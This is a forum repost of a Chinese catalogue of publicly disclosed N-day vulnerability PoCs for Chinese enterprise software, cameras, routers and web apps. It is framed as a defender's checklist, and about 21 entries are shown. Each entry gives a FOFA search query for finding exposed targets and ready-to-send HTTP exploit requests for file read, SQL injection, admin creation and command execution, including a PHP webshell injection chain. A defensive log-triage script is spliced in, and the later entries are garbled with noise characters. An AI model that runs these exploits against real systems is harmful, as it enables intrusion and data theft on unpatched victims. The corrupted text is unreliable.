Collection of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

[复制链接]
跳转到指定楼层
楼主
Posted on 2024-6-5 14:31:29
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attacks, and this article is meant to help with defense. Defenders can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 PoCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that are too long have been replaced by the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team via the backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list". This article is already the most complete version; when using it, press F12 and search for the keyword you need.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).
Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运主动安全监控云平台 arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC智能物联综合管理平台 arbitrary file read
21. 大华ICC智能物联综合管理平台 random remote code execution
22. 大华ICC智能物联综合管理平台 log4j remote code execution
23. 大华ICC智能物联综合管理平台 fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo endpoint SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud 政府财务云 arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空社会化商业ERP validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart管理平台 importexport.php SQL injection
61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普掌上校园服务管理平台 service.action remote command execution
77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
79. BYTEVALUE 百为流控路由器 remote command execution
80. 速达天耀软件 DesignReportSave.jsp endpoint arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. 安恒明御安全网关 aaa_local_web_preview file upload
88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
89. 致远互联FE协作办公平台 editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
92. 海康威视运行管理中心 session command execution
93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600防火墙 obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视高清智能录播系统 busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能S210管理平台 uploadfile.php arbitrary file upload
119. 北京百绰智能S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能S40管理平台 导入web.php arbitrary file upload
121. 北京百绰智能S42管理平台 userattestation.php arbitrary file upload
122. 北京百绰智能s200管理平台 /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研工程质量检测系统 arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5云商城 file.php file upload
134. 网康NS-ASG应用安全网关 index.php SQL injection
135. 网康NS-ASG应用安全网关 list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅通信指挥调度平台 down_file.php SQL injection
138. 福建科立讯通信指挥调度平台 pwd_update.php SQL injection
139. 福建科立讯通信指挥调度平台 editemedia.php SQL injection
140. 福建科立讯通信指挥调度平台 get_extension_yl.php SQL injection
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL injection
142. CMSV6车辆监控平台 weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔消防救援作战调度平台 SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信票务管理平台 SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6车载定位监控平台 SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point Security Gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. 电信网关配置管理系统 rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C校园网自助服务系统 flexfileupload arbitrary file upload
179. 建文工程管理系统 arbitrary file read
180. 帮管客CRM jiliyu SQL injection
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼应用虚拟化系统 SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会视频会议 attachment arbitrary file read
189. 蓝网科技临床浏览系统 deleteStudy SQL injection
190. 短视频矩阵营销系统 poihuoqu arbitrary file read
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
195. 飞鱼星上网行为管理系统 send_order.cgi command execution
196. 河南省风速科技统一认证平台 password reset
197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload endpoint file upload
200. SeaCMS海洋影视管理系统 dmku SQL injection
201. 方正全媒体新闻采编系统 binary SQL injection
202. 微擎系统 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA:title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA:title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA:title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA:title="EasyCVR"
Replace password with the MD5 of the password you choose.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运主动安全监控云平台 arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA:icon_hash="-1344736688"
Log in to the backend with the default admin account, then send the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
FOFA:icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA:title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the injected PHP executes the base64-decoded value of a request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA:body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA:body="jshERP-boot"
The leaked content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip
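The article frames itself as a checklist for defenders, so here is an added triage example that is not part of the original article or of any vendor's code: a small Python script that reads web-server access-log lines and flags the request shapes used by entries 2, 9, 14 and 15 (dot-dot traversal into /etc/passwd, the `;.ico` matrix-variable suffix and the `a.ico/../` hop that both resolve to getAllList, and a double URL-encoded error-based SQL injection). The log lines are constructed for the example; it assumes Common Log Format and a lenient backend router that strips matrix variables and collapses `.`/`..` before dispatch, which is why the "effective path" it reports is the handler the request actually reaches.

```python
"""Access-log triage for the request shapes catalogued above (added example).

Assumptions: Common Log Format lines, and a backend router that strips
matrix variables (";...") and collapses "." / ".." before dispatch.
"""
import posixpath
import re
from urllib.parse import unquote, urlsplit

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MATRIX_RE = re.compile(r';[^/]*')          # ";.ico", ";stok=..." inside one path segment
SQLI_RE = re.compile(
    r"(?i)\b(extractvalue|updatexml)\s*\(|'\s*(and|or)\b|waitfor\s+delay|union\s+select"
)

# Constructed sample lines (not real traffic), mirroring entries 2, 9, 14 and 15.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2024:10:01:02 +0800] "GET /static/../../../../../../etc/passwd HTTP/1.1" 200 1432
10.0.0.6 - - [05/Jun/2024:10:01:03 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 8821
10.0.0.7 - - [05/Jun/2024:10:01:04 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 8821
10.0.0.8 - - [05/Jun/2024:10:01:05 +0800] "GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38 HTTP/1.1" 200 512
10.0.0.9 - - [05/Jun/2024:10:01:06 +0800] "GET /index.html HTTP/1.1" 200 3021
"""


def full_decode(value, max_rounds=4):
    """Percent-decode until the string stops changing; return (decoded, layers peeled)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def normalize_path(path):
    """The path as a lenient router sees it: matrix variables stripped, ./.. collapsed."""
    segments = [MATRIX_RE.sub("", seg) for seg in path.split("/")]
    return posixpath.normpath("/".join(segments)) or "/"


def triage_target(target):
    """Classify one request target; return its findings and the effective routed path."""
    decoded, rounds = full_decode(target)
    parts = urlsplit(decoded)
    findings = []
    if ".." in parts.path.split("/"):
        findings.append("path-traversal")
    if MATRIX_RE.search(parts.path):
        findings.append("matrix-variable")
    if rounds >= 2:                     # one layer is normal browser encoding; two is evasion
        findings.append("double-url-encoding")
    if SQLI_RE.search(parts.query):
        findings.append("sqli-pattern")
    return {"target": target, "effective_path": normalize_path(parts.path), "findings": findings}


def triage_log(text):
    """Return the verdict for every request line that carries at least one finding."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            verdict = triage_target(match.group("target"))
            if verdict["findings"]:
                hits.append(verdict)
    return hits


if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print(hit["effective_path"], hit["findings"], "<-", hit["target"])
```

Comparing the effective path against the raw path is the point of the exercise: a rule that only greps for `getAllList` misses the `;.ico` and `a.ico/../` variants, and a rule that only looks for `'` or `extractvalue` in the raw request misses the double-encoded keyword payload until it has been decoded twice.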
+ d% S# s5 e8 s  C+ [; ?* g* k! Q0 Y; H7 \. @, y
* k$ Z6 |# d  a* B1 I/ C6 `7 h* r
16.  红帆HFOffice医微云SQL注入4 W( c7 Y  D: T) e& S8 \1 Z. K
FOFA:title="HFOffice". J, O( g8 z) P, j2 ~$ m
poc中调用函数计算1234的md5值
( B. W+ |' r4 }7 c3 s( S+ ^8 t9 ZGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
# |: s+ B; t3 x' E$ h9 NHost: x.x.x.x
. x* J& s) ^1 S% v& v! gUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
8 a0 U, Y4 R, O: i$ k, cConnection: close: J" p8 ]# Z- t
Accept: */*
7 V+ L- g! R. L! m0 p+ O& c) ?' `Accept-Language: en
  @8 W" V1 G+ e; ]# PAccept-Encoding: gzip; M% n; o# F" W9 g+ `

+ }" e! k9 ~$ \8 f+ d1 t4 Z1 t! l2 C
+ S/ n( X3 c1 K! Q& r17. 大华 DSS itcBulletin SQL 注入
" D: }, t5 }# a) S5 j5 EFOFA:app="dahua-DSS"
* g$ Q+ a4 q1 C2 K6 APOST /portal/services/itcBulletin?wsdl HTTP/1.1% |, q3 O) d4 d6 g2 i4 k- I
Host: x.x.x.x) m* l! c; W* E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( c% `' ^9 m2 X3 J9 d
Connection: close
4 n/ e) S" r1 `+ o8 H4 OContent-Length: 345
" C  _0 k8 g' O$ x' j8 J+ j( uAccept-Encoding: gzip9 E  U3 v! m  r! A
* D) I* N( r, j5 |
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
% U, Q3 \+ x. ~) n<s11:Body>$ Z4 K! n: R) i) J: E
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>, p) E: M" R2 _# B% l/ X
      <netMarkings># T$ c& f) {8 R" t' W6 R
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=19 J' N+ W) Z# i6 \0 ~- b
      </netMarkings>  \4 t3 Q6 ]* V- a
    </ns1:deleteBulletin>
/ b  n) O& h8 v4 x! B( T  </s11:Body>
# y0 }& C! ^; R0 {: H' u$ m</s11:Envelope>
5 r3 d# T4 B! f/ M  [" {5 x" g! z. F% I4 }5 A% X6 a

( g7 |2 |' t+ K) B5 V$ R0 n18. 大华 DSS 数字监控系统 user_edit.action 信息泄露, A  n) P7 {1 C
FOFA:app="dahua-DSS"7 B! R6 I: t. B, P
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1  I, o# i% U9 ^" k) g7 [
Host: your-ip/ _1 k& J+ ?( D4 I! v* C  M0 Z2 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 ^: X& A9 D/ r% Z% v- lAccept-Encoding: gzip, deflate; X, F/ P4 T+ ?0 c, v, s: ~* j
Accept: */*7 n' y; ]- p0 f8 U* ?" @% i
Connection: keep-alive+ K6 d3 P. b3 k

2 O( _% m0 m! k! m3 R& ?6 E
& N% Y: y2 A# o+ Y* R" P: C" Q% T
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
3 r2 z( i# A0 X2 E3 X9 x5 oFOFA:app="dahua-DSS"
+ g- ]  G1 i# d  C' rGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
& S8 }# ^! X7 @& B1 N( sHost:
" N  a  C1 x& k. @/ a. q5 qUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.368 y" J  ?; b( g7 L! t  u
Accept-Encoding: gzip, deflate/ ^% D6 b+ v+ C  S' k7 [2 {4 J
Accept: */*
8 v% t/ Q0 D# cConnection: keep-alive
% h2 {* {. ?1 p4 E* m9 N
* }! Z$ B; _. u( E* x
. J- ~6 a. P- u/ Q4 @20. 大华ICC智能物联综合管理平台任意文件读取; T& b) D+ a" ~& }* J9 j, r
FOFA:body="*客户端会小于800*"+ D- F" e# c8 w4 e6 C, u* t
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
) Y3 C4 ?! M! Y* y* ], xHost: x.x.x.x
1 {: ?, l" G" o! E# O1 w4 m. dUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) E; t9 d, Y* \* I, ZConnection: close- i8 M# ]8 t1 n
Accept: */*
* J1 t  i, A7 R( q) CAccept-Language: en. C2 g" A. b2 n+ M) S4 v' P8 x  M
Accept-Encoding: gzip& f, {  ^/ x: C& {) p% l  M

* E4 ]! q( o8 Y$ P
4 i, Y# O0 D2 ]( ?: m/ }21. 大华ICC智能物联综合管理平台random远程代码执行
# |7 Z. f( W, D/ Z9 |( mFOFA:icon_hash="-1935899595"4 U( Z7 p  p! G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1) r# F5 u- F3 U# |$ w
Host: x.x.x.x
